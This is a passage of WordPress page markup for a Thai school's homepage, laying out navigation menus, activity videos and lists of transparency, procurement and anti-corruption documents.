{\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"